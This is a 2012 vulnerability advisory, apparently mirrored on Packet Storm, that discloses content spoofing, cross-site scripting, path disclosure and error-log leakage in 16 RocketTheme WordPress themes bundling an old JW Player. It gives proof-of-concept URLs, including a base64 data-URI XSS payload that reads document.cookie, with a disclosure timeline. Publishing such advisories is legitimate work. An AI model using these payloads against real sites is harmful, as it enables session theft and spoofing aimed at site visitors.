exploit the possibilities

WordPress Rokbox Themes Content Spoofing / XSS

WordPress Rokbox Themes Content Spoofing / XSS
Posted Dec 24, 2012
Authored by MustLive

Multiple WordPress themes by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities.

tags | exploit, spoof, vulnerability, xss
MD5 | 174aecaeac07b60df572036a7c2e6522

WordPress Rokbox Themes Content Spoofing / XSS

Change Mirror Download
Hello list!

Some time ago, when I've found vulnerabilities in plugin BuddyPress for
WordPress (particularly in Affinity BuddyPress theme for it) with Rokbox,
which I disclosed earlier, I also found multiple vulnerable themes for WP
with Rokbox.

So I want to warn you about multiple vulnerabilities in multiple themes for
WordPress. These are themes developed by Rokbox's developers. And they put
Rokbox (with JW Player, but without TimThumb) into their themes.

These are Content Spoofing, Cross-Site Scripting, Full path disclosure and
Information Leakage vulnerabilities. I've disclosed vulnerabilities in JW
Player in June and August (including in commercial version JW Player Pro)
and disclosed vulnerabilities in Rokbox in December. These vulnerabilities
are similar to vulnerabilities in Affinity BuddyPress theme. Also I've found
many WP themes by other developers with Rokbox, but I'd write about them
separately, because they have much more holes.

-------------------------
Affected products:
-------------------------

Vulnerable are all WordPress themes by RocketTheme (during quick research I
found 16 themes for WP, in addition to above-mentioned theme for BP, but I
supposed all their themes contain Rokbox with JW Player 4.4.198). They
haven't removed this vulnerable version of JW Player from Rokbox and so from
any of their themes (for WP and BP), when I've informed them in August.

Here are these 16 vulnerable themes, which I found:

rt_afterburner_wp
rt_refraction_wp
rt_solarsentinel_wp
rt_mixxmag_wp (Mixxmag)
rt_iridium_wp
rt_infuse_wp (infuse)
rt_perihelion_wp
rt_replicant2_wp
rt_affinity_wp
rt_nexus_wp
rt_sentinel
rt_mynxx_wp_vestnikp
rt_mynxx_wp (rt.mynxx.wp)
rt_moxy_wp
rt_terrantribune_wp
rt_meridian_wp

They will be added to those 94 vulnerable themes for WordPress, in which
I've found vulnerabilities (http://websecurity.com.ua/4915/).

In Google's index there are now up to 634000 pages with Rokbox at WP sites.
So there are a lot of vulnerable themes and web sites with these themes.

----------
Details:
----------

The paths for these themes are the next:

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf

Content Spoofing (WASC-12):

In parameter file there can be set as video, as audio files.

Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg

Content Spoofing (WASC-12):

Swf-file of JW Player accepts arbitrary addresses in parameter config, which
allows to spoof content of flash - i.e. by setting address of config file
from other site (parameters file and image in xml-file accept arbitrary
addresses). For loading of config file from other site it needs to have
crossdomain.xml.

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

1.xml

<config>
<file>1.flv</file>
<image>1.jpg</image>
</config>

Content Spoofing (WASC-12):

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Full path disclosure (WASC-13):

In all these themes there is FPD in index.php
(http://site/wordpress/wp-content/themes/rt_afterburner_wp/ and the same for
other themes), which works at default PHP settings. Also potentially there
are FPD in other php-files of these themes.

Information Leakage (WASC-13):

There are sites with rt_mixxmag_wp theme, which have error log with full
paths.

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

------------
Timeline:
------------

2012.05.29 - informed developers of JW Player.
2012.06.06 - disclosed at my site about JW Player.
2012.08.18 - informed developers about new holes in JW Player Pro.
2012.08.23 - disclosed at my site about JW Player Pro.
2012.08.28 - informed developers of Rokbox.
2012.12.14 - disclosed at my site about Rokbox.
2012.12.23 - disclosed to the lists about multiple themes for WordPress with
Rokbox.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close